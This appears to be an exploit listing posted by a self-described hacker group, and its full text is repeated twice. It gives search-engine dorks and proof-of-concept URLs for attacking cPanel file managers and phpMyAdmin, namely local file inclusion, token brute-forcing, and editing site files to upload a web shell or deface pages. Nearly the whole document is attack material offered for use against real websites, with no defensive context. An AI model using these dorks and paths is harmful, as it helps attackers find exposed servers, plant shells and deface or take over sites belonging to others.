-------------------------------------------------------------------
Author : CyberCode Khorasan [0xCCBF]
Thanks to : All Khorasan CyberArmy Member (Special to: Cep Engking, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, XTreMist, PKShadow, DR. Ninja, DB Bust3r, Bagus Hacks)
LFI
---------------------------------
DORK => inurl:/frontend/x3/filemanager/dir.html?dir=
Brute-Force Attack (md5-hash)
---------------------------------
DORK => inurl:/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
POC => http://[sites]/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
Edit Files (upload shell / deface)
------------------------------------
DORK => inurl:/frontend/x3/filemanager/editit.html?file=
POC => http://[sites]/frontend/x3/filemanager/
[file_name] = index.php, index.html, etc
[path] = /home/[user]/
Author : CyberCode Khorasan [0xCCBF]
Thanks to : All Khorasan CyberArmy Member (Special to: Cep Engking, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, XTreMist, PKShadow, DR. Ninja, DB Bust3r, Bagus Hacks)
LFI
---------------------------------
DORK => inurl:/frontend/x3/filemanager/dir.html?dir=
Brute-Force Attack (md5-hash)
---------------------------------
DORK => inurl:/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
POC => http://[sites]/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
Edit Files (upload shell / deface)
------------------------------------
DORK => inurl:/frontend/x3/filemanager/editit.html?file=
POC => http://[sites]/frontend/x3/filemanager/
[file_name] = index.php, index.html, etc
[path] = /home/[user]/
Categories:
Exploit